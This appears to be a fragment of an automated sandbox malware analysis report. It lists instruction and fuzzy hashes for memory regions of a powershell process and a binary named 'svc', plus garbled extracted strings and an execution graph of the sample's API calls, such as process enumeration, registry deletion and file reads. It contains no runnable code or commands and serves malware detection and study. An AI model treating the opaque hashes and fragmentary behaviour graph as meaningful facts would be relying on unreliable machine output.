                                                • Instruction Fuzzy Hash: 70F027F66041089BE304AB78C0197EB77AADFC0314F10826AE5054B3C5CE392906CBE1
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b219d575855039b96bdaff36a8f2aec31b3b69f0c87dc9f4cfba6ca5c423e825
                                                • Instruction ID: 757f0fa484ba486c3805d28264072ee93c72bda14120ce68cdf41d3b5b50997c
                                                • Opcode Fuzzy Hash: b219d575855039b96bdaff36a8f2aec31b3b69f0c87dc9f4cfba6ca5c423e825
                                                • Instruction Fuzzy Hash: 90F0A0B9B005088FCB0497BCD880A9E77E6EBCC3907054254EA19CB394DE24ED028B90
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 17e19fce70d897f0804006a96356babb9e0e0e4f3fe951eda7c585eefc5cc54d
                                                • Instruction ID: dd6603dad24bd61018514bf646dcb067c1b4e6cba82ded3c0bafc4f36b1fa0c4
                                                • Opcode Fuzzy Hash: 17e19fce70d897f0804006a96356babb9e0e0e4f3fe951eda7c585eefc5cc54d
                                                • Instruction Fuzzy Hash: 33E01A397401148FC7109B1DD898C6AB7FAEFCEB2531914AAE649CB761DA71EC11CB90
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0de3f9c6c95236796f05732525d6572b0112fbfe073bdba130da061ab5d7a952
                                                • Instruction ID: 6685f2ec7de5f349b52afbaa11ce405d9c7309e0f8f253a1643faf62315e56fc
                                                • Opcode Fuzzy Hash: 0de3f9c6c95236796f05732525d6572b0112fbfe073bdba130da061ab5d7a952
                                                • Instruction Fuzzy Hash: F4F05EB5A093518FD7609BB8D4993DABBE1EF45310F04446EE55ED7281CB392984CB90
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c2579a1f5e5d5a07ae8c28ec404cd1c844fcaecb90f4397fa840bc72c6e5acf
                                                • Instruction ID: 346bc71791b05abf94e8604c1c280de94b961abc2e9d4e0d9bcb7412445cd72b
                                                • Opcode Fuzzy Hash: 6c2579a1f5e5d5a07ae8c28ec404cd1c844fcaecb90f4397fa840bc72c6e5acf
                                                • Instruction Fuzzy Hash: 9AF0E5B17083405BC70A6734D82D3EE7E66ABC5314F05016AEA1987382CF7C081183E6
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 89dafbc3ea6c9d027d66da2de2323f64caee75a199a7cc87cdcc8013a9d24354
                                                • Instruction ID: 8899c6d43699b2a860dbb0259be381e10bddae48e5be890510dcdc1bbe3bd475
                                                • Opcode Fuzzy Hash: 89dafbc3ea6c9d027d66da2de2323f64caee75a199a7cc87cdcc8013a9d24354
                                                • Instruction Fuzzy Hash: 48E0267270826013C718D16DE8245E77AAB87C2620708C07EF098CB3C6DD129C0283C1
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1eb2dfa19ad99db43f7fc005fc41202a17769be147167530f2eba12e38488e14
                                                • Instruction ID: f54296b9f1d10e024e3c1f8879010c092163eeb59a7cf76ba88be88d2e303742
                                                • Opcode Fuzzy Hash: 1eb2dfa19ad99db43f7fc005fc41202a17769be147167530f2eba12e38488e14
                                                • Instruction Fuzzy Hash: BEF0EDB19013049BD764ABB9D49D79ABBE9FB84310F004529E55ED7280DB396980CB90
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e93d2ab83dd3512a9745903dcb46d47d2c1143fb6979694a4dc53379caf4a760
                                                • Instruction ID: 454c1888335e25fcaaee42e75fcea44f6fbb47d3ccb18dcebe81c7d3b5da5f6a
                                                • Opcode Fuzzy Hash: e93d2ab83dd3512a9745903dcb46d47d2c1143fb6979694a4dc53379caf4a760
                                                • Instruction Fuzzy Hash: D6E0DF7530431087CB092774E80D3EE7A9AABC4725F00002AE60A83381CF7C090183E9
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 16ee490906f95f0b164fa2201edce2750702463f0bfed14ba7a356b06ceb9004
                                                • Instruction ID: 083d25e412d2ee12924e80d9463f73d4d851bb8f71b3aa6bed328fea849109eb
                                                • Opcode Fuzzy Hash: 16ee490906f95f0b164fa2201edce2750702463f0bfed14ba7a356b06ceb9004
                                                • Instruction Fuzzy Hash: ADE0E5B1E0425A9ECB90DFB884412A9FFF0EF09250B2086AECD08E7241E7324612CBC1
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 706b7507e4d76c208ad777d81f7e67bdf1faf044ba6830a44e75b73bf1f576e9
                                                • Instruction ID: 0f17369354eaceef570520fe27ed4e751bb917af44da3db21ff2380bb6a2acd2
                                                • Opcode Fuzzy Hash: 706b7507e4d76c208ad777d81f7e67bdf1faf044ba6830a44e75b73bf1f576e9
                                                • Instruction Fuzzy Hash: C5D05E6330012A279A9460AE180177B91CFCEC8AA0B054176BA99C32C3EC51CD07D3F5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                • Instruction ID: f559a61bfb94b47b7ef4153f82e3df9da2fd80eb9b50fed491d03a1afa6113eb
                                                • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                • Instruction Fuzzy Hash: 3EE08631B0401497CB08956AD4104D9FBAADBCC324F14847AD90AA7380DA725916D7E1
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 84d81b25308bf1b117a543c1b8891c2fb2c88d77ac562d59447e2b2c0615303e
                                                • Instruction ID: 645f154a7871403fb436615f40a71e1b1d00e2c93a8e230366278752cd290640
                                                • Opcode Fuzzy Hash: 84d81b25308bf1b117a543c1b8891c2fb2c88d77ac562d59447e2b2c0615303e
                                                • Instruction Fuzzy Hash: AEE08C31700615A7C615A6AEA81089F76DADAC4761310852EE02EC7380DE689D0187E5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25280521e64c3504c2bb5b5660de78c785524887ba8e1f709229b76bec8f6f0c
                                                • Instruction ID: 31713229d7488e2b78c43adbf6b8149b348502cba16b11f6b0767ab8d2c8190a
                                                • Opcode Fuzzy Hash: 25280521e64c3504c2bb5b5660de78c785524887ba8e1f709229b76bec8f6f0c
                                                • Instruction Fuzzy Hash: 36E04FB58092099BCB08EB60E4165EE7B34F610301B40455EDA8693280DE39164ACFD1
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 76685346b70c53d337b115fb7ae69781347db9c1a54858e79fd64cfd1a3c9a67
                                                • Instruction ID: 1e5eb4137d2f00f8db010d861bf032b06de88d9685226df81f6cfdf05f56453f
                                                • Opcode Fuzzy Hash: 76685346b70c53d337b115fb7ae69781347db9c1a54858e79fd64cfd1a3c9a67
                                                • Instruction Fuzzy Hash: 44E08675E052878BC718EFB4D4466EE7FF2AB85205F004159D98597740DA351842DF80
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                • Instruction ID: 80e5a7b700f1959b85edb3066dc615af39ecfc0da44ff861ceb52f0d41a53282
                                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                • Instruction Fuzzy Hash: F5D042B4D042099F8790EFAD894156EFBF4AB48200B6085AA8919E7251E6329A528BD1
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dc9244ca28ebc070aaffee57aa328e8b2b007d29129d58dc2087b3ce776761d3
                                                • Instruction ID: d9a4e8e8bfb0e1bd3cb0279a1af7dbc69f5253d00b268da46b3a50048c24c551
                                                • Opcode Fuzzy Hash: dc9244ca28ebc070aaffee57aa328e8b2b007d29129d58dc2087b3ce776761d3
                                                • Instruction Fuzzy Hash: D4D012749042498BC708EFA4D4465AEBBB4AB44300F004155D94593340DA305845CFC1
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0ca82b5ad02590091cbf06dc4574eded0f10b9743f73b41284ee321044f8a91e
                                                • Instruction ID: e2ff3deaa9665844e598b82409b29b540f484bf8291d15af12a562d83985b624
                                                • Opcode Fuzzy Hash: 0ca82b5ad02590091cbf06dc4574eded0f10b9743f73b41284ee321044f8a91e
                                                • Instruction Fuzzy Hash: 82D067758052098BCB08ABA5E85B5FEBB34FA54305F404169D907531D0EE361A5ACEC1
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 03a8575814de8c5545c833163c3e27dc3d9abaad471bc68a8d012acc10f0efec
                                                • Instruction ID: 639f5e3efb7344d9bc6f710ac0534952b12c8d84f7b532131b70a3896fcfc94f
                                                • Opcode Fuzzy Hash: 03a8575814de8c5545c833163c3e27dc3d9abaad471bc68a8d012acc10f0efec
                                                • Instruction Fuzzy Hash: 6FC08C3630E3C18FDF0B8B334920397BF32BE4335232580D3C502C29A2DA224210C340
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ada35e7c83b5b84bbaab6869cb4a791818f2e953ff133e0e6ea5245b529bf25d
                                                • Instruction ID: 0d530e3d90ef8b146af902cd23b5a56aadd35c8a6a54aada13a05edcd7f82de9
                                                • Opcode Fuzzy Hash: ada35e7c83b5b84bbaab6869cb4a791818f2e953ff133e0e6ea5245b529bf25d
                                                • Instruction Fuzzy Hash: 2DD0123504434DCBD2586F71E535674B379AF80304B510496F50E1AFA68E6BAC81CE89
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ec6c7c5ff1990658222cf385c4c7d0108d070fa7e2e535a83790b23e88dd0b9
                                                • Instruction ID: fddfdb20303ef076c1b4775c137614f3834da2817a1d1788e84caa38b042e386
                                                • Opcode Fuzzy Hash: 3ec6c7c5ff1990658222cf385c4c7d0108d070fa7e2e535a83790b23e88dd0b9
                                                • Instruction Fuzzy Hash: F5B0923014430C8FC2486F75E615924736DAA8160939004A8E60E4B3A68E7AE840CA44
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1735195011.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_6f50000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fkq$`Qfq$`Qfq$`Qfq$`Qfq$tPfq$tPfq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                • API String ID: 0-897512475
                                                • Opcode ID: 39b94191e50b5aaf79681b24772df6099d6f5e9c1ebe40a555d61fc3b7c8c6aa
                                                • Instruction ID: 0215374d535c43cf085c154b580602162c24d65c283bf01f99f60a20020765a4
                                                • Opcode Fuzzy Hash: 39b94191e50b5aaf79681b24772df6099d6f5e9c1ebe40a555d61fc3b7c8c6aa
                                                • Instruction Fuzzy Hash: A7F1E731F00209DFDB55DFA8C4457AB7BE6AF85315F16846AEE018B691CB31EC81CBA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1735195011.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_6f50000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'fq$4'fq$tPfq$tPfq$tPfq$tPfq$$fq$$fq$$fq
                                                • API String ID: 0-534720917
                                                • Opcode ID: 3ebf5c72d8aba7d98ed87042154a4c2121ae56153558bfe129e02b966b2c3141
                                                • Instruction ID: 34090b4ed079c03601b73dde5cc538806a3572b4d97a4cf012c92c299a0d216f
                                                • Opcode Fuzzy Hash: 3ebf5c72d8aba7d98ed87042154a4c2121ae56153558bfe129e02b966b2c3141
                                                • Instruction Fuzzy Hash: C7C15932F043059FDBA48BBC880176BBBE6AF85750F15826ADA45CB291DB31DD41C7A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1735195011.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_6f50000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fkq$`Qfq$`Qfq$tPfq$$fq$$fq$$fq$$fq$$fq
                                                • API String ID: 0-59738900
                                                • Opcode ID: c743cae3b284da1ecbe8c40247747cd99543d85f5729abee2b6f1db2f3c450e4
                                                • Instruction ID: 8fd08e3bcf2ed06d6c2f6dc3778953f0be1fbef62c3e5bb30f300da768b9e950
                                                • Opcode Fuzzy Hash: c743cae3b284da1ecbe8c40247747cd99543d85f5729abee2b6f1db2f3c450e4
                                                • Instruction Fuzzy Hash: 1871BF31E00208DFEB64CE44C585BAABBF6AF45345F0A8196EE019B691C735FD85CBA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1735195011.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_6f50000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq
                                                • API String ID: 0-332123906
                                                • Opcode ID: 4d6984b60147bc0bff23024a8cb8342c88d44bb3d18d79bfb937fec68ca683b4
                                                • Instruction ID: fe8f6c57789d8e5332933ec22035977a8ddc86d812ff62fd5aa7a2ed1912e17a
                                                • Opcode Fuzzy Hash: 4d6984b60147bc0bff23024a8cb8342c88d44bb3d18d79bfb937fec68ca683b4
                                                • Instruction Fuzzy Hash: 81716737F042149FCB549BACC40176BBBE6AFC56A0F16806ADA05CB291EF31DC41C7A2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1735195011.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_6f50000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
                                                • API String ID: 0-1373546133
                                                • Opcode ID: 20f79c930b05c4074156af07d5ad33c88db71a8549c0770c53c3334e22b031f7
                                                • Instruction ID: 5ab3f4797982e2923707936d4ead6a6429dd61f691807338f96e1bd38af6079c
                                                • Opcode Fuzzy Hash: 20f79c930b05c4074156af07d5ad33c88db71a8549c0770c53c3334e22b031f7
                                                • Instruction Fuzzy Hash: 51D11632F042158FCB949BB8844566ABBE2AFC5210F16847BDB05CB651DF32CD81C7E2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1735195011.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_6f50000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'fq$4'fq$$fq$$fq$$fq
                                                • API String ID: 0-3759051638
                                                • Opcode ID: 19e68214a0e05984c31370e02cb1b078805e105f5b373146b1791fd9299a8f02
                                                • Instruction ID: a9715c71a321aa059955dbad9805fe26c1be50ecfd2f301c014390582b272e33
                                                • Opcode Fuzzy Hash: 19e68214a0e05984c31370e02cb1b078805e105f5b373146b1791fd9299a8f02
                                                • Instruction Fuzzy Hash: 64514873F08345DFDB654AAD9800767BBA6AFC5291F16807BDA45CB241EB31CC41C7A2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: `gq$`gq$`gq$`gq
                                                • API String ID: 0-3352594996
                                                • Opcode ID: 39f12bf5d966ae63b8855b364cfa15c671a03b4a7d8dd283893d2aa30a85c219
                                                • Instruction ID: fa83bcfb08146bc09cffb1b94d0f59e38e6ae88b00c49bd7bd3b0171cf90bd7a
                                                • Opcode Fuzzy Hash: 39f12bf5d966ae63b8855b364cfa15c671a03b4a7d8dd283893d2aa30a85c219
                                                • Instruction Fuzzy Hash: B1B183B4E012099FCB55DFA9D990A9DFBF2FF48300F10862AE419AB355DB34A945CF90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1735195011.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_6f50000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'fq$4'fq$tPfq$tPfq
                                                • API String ID: 0-2816350295
                                                • Opcode ID: ccb659b8f3e3bf5af3470a5c47f1fedc9ae61ef42bc604e7dbb818236bdc5f27
                                                • Instruction ID: 0bc249b5ed5fbf8aaa91ff662315773801a2bd0d2a39d614e6fb169ef95c3df8
                                                • Opcode Fuzzy Hash: ccb659b8f3e3bf5af3470a5c47f1fedc9ae61ef42bc604e7dbb818236bdc5f27
                                                • Instruction Fuzzy Hash: FC813532F002059FDB64DBA9845076BFBE6AFC5310F1A816BDE058B642CB31ED42C7A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: `gq$`gq$`gq$`gq
                                                • API String ID: 0-3352594996
                                                • Opcode ID: 80b25b73811c4e1171c34c95741c001f664caad0f28fc7c42deaa518f250e580
                                                • Instruction ID: b10e2ea00bc50f6abfc1e83c0c42b4e8d9d82f28367b335b09a2a41d67889a5b
                                                • Opcode Fuzzy Hash: 80b25b73811c4e1171c34c95741c001f664caad0f28fc7c42deaa518f250e580
                                                • Instruction Fuzzy Hash: 06B182B4E012099FDB54DFA9D990A9DFBF2FF88300F108629E419AB355DB34A945CF90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1735195011.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_6f50000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'fq$4'fq$tPfq$tPfq
                                                • API String ID: 0-2816350295
                                                • Opcode ID: 46de1ae1c7ebf2f9b2ad51c27888b97c4472b7abf6bf013f2335379eb45229e3
                                                • Instruction ID: d943976c9272495563da7493f27e730793ae164f4b992c82e4b743e2b76192e9
                                                • Opcode Fuzzy Hash: 46de1ae1c7ebf2f9b2ad51c27888b97c4472b7abf6bf013f2335379eb45229e3
                                                • Instruction Fuzzy Hash: 1471E673F042059FDBA48BAD840676BBBA2AF85750F16807ADB05CB651EA31DC41C7E2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1735195011.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_6f50000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $fq$$fq$$fq$$fq
                                                • API String ID: 0-2113499236
                                                • Opcode ID: 020b3e1e7ebd8874fdf4ce7e7e2e38413b4b6f9089c676b157941760b75820ed
                                                • Instruction ID: 7c00c54daba9036c911e84293b60820aac4c16ce7f06a4a7a23fb38aff326d06
                                                • Opcode Fuzzy Hash: 020b3e1e7ebd8874fdf4ce7e7e2e38413b4b6f9089c676b157941760b75820ed
                                                • Instruction Fuzzy Hash: F2214932F242449FDBB459BE9800727B7DBABC0316F25842AAE05CB782DD75CC41C3A2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1735195011.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_6f50000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'fq$4'fq$$fq$$fq
                                                • API String ID: 0-2206495126
                                                • Opcode ID: a34e579c23ce140da185e74239172192d8d137f1a33df893e16a565e02180eeb
                                                • Instruction ID: eaff789ea33ac3c25f068ec84f4bc1e33db9c52bac44efa819422702feede17d
                                                • Opcode Fuzzy Hash: a34e579c23ce140da185e74239172192d8d137f1a33df893e16a565e02180eeb
                                                • Instruction Fuzzy Hash: A401D412B0A3814FC7AB577848219267FB71F8265072B41DBD581CF2A7CE194D0683A7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1885387365.00007FF6FB801000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FB800000, based on PE: true
                                                • Associated: 00000004.00000002.1885280582.00007FF6FB800000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1885508595.00007FF6FB820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1885636455.00007FF6FB845000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1887338497.00007FF6FC1E5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1887404159.00007FF6FC1E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1887453346.00007FF6FC1F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1887500788.00007FF6FC1F7000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1887651324.00007FF6FC1F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff6fb800000_svc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8e73cc89a7b2412dcc030e8898ac927593eb6f92fc7e90c5c81b4546cc2ae7cf
                                                • Instruction ID: 5efa3ef0a46971423ee1221c5a3730cd49eadbfd476b9b34cb544a5b2dd17de3
                                                • Opcode Fuzzy Hash: 8e73cc89a7b2412dcc030e8898ac927593eb6f92fc7e90c5c81b4546cc2ae7cf
                                                • Instruction Fuzzy Hash: 4EB01230D1520B88EB047F02E84125836206F4C7C0F806030E42C833E2DF7C60518710

                                                Execution Graph

                                                Execution Coverage:48.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:39.4%
                                                Total number of Nodes:231
                                                Total number of Limit Nodes:23
                                                execution_graph 556 7ff6cd4126e8 557 7ff6cd412716 556->557 558 7ff6cd4128be 556->558 559 7ff6cd41284a GetProcessHeap HeapAlloc K32EnumProcesses 557->559 560 7ff6cd41271c 557->560 561 7ff6cd412b0a ReadFile 558->561 562 7ff6cd4128cc 558->562 580 7ff6cd412888 559->580 583 7ff6cd4127b7 559->583 564 7ff6cd412729 560->564 565 7ff6cd412841 ExitProcess 560->565 563 7ff6cd412b34 561->563 561->583 566 7ff6cd412b00 562->566 567 7ff6cd4128d5 562->567 573 7ff6cd4119ac 3 API calls 563->573 563->583 569 7ff6cd4127e4 RegOpenKeyExW 564->569 584 7ff6cd412732 564->584 568 7ff6cd411768 22 API calls 566->568 570 7ff6cd4128e0 567->570 571 7ff6cd412aa5 567->571 568->583 574 7ff6cd412811 RegDeleteValueW 569->574 575 7ff6cd412825 569->575 577 7ff6cd412921 570->577 578 7ff6cd4128e5 570->578 576 7ff6cd411a44 ReadFile 571->576 572 7ff6cd4110c0 30 API calls 572->580 581 7ff6cd412b53 573->581 574->575 626 7ff6cd411ac4 SysAllocString SysAllocString CoInitializeEx 575->626 585 7ff6cd412ab4 576->585 642 7ff6cd411a44 577->642 578->583 639 7ff6cd411958 578->639 580->572 580->583 581->583 593 7ff6cd412b67 GetProcessHeap HeapAlloc 581->593 594 7ff6cd4127bc 581->594 584->583 589 7ff6cd41274f ReadFile 584->589 585->583 590 7ff6cd411a44 ReadFile 585->590 588 7ff6cd41282a 634 7ff6cd411768 GetProcessHeap HeapAlloc 588->634 589->583 596 7ff6cd412779 589->596 597 7ff6cd412acb 590->597 592 7ff6cd412938 ReadFile 592->583 599 7ff6cd412960 592->599 600 7ff6cd4114e4 13 API calls 593->600 607 7ff6cd412c18 4 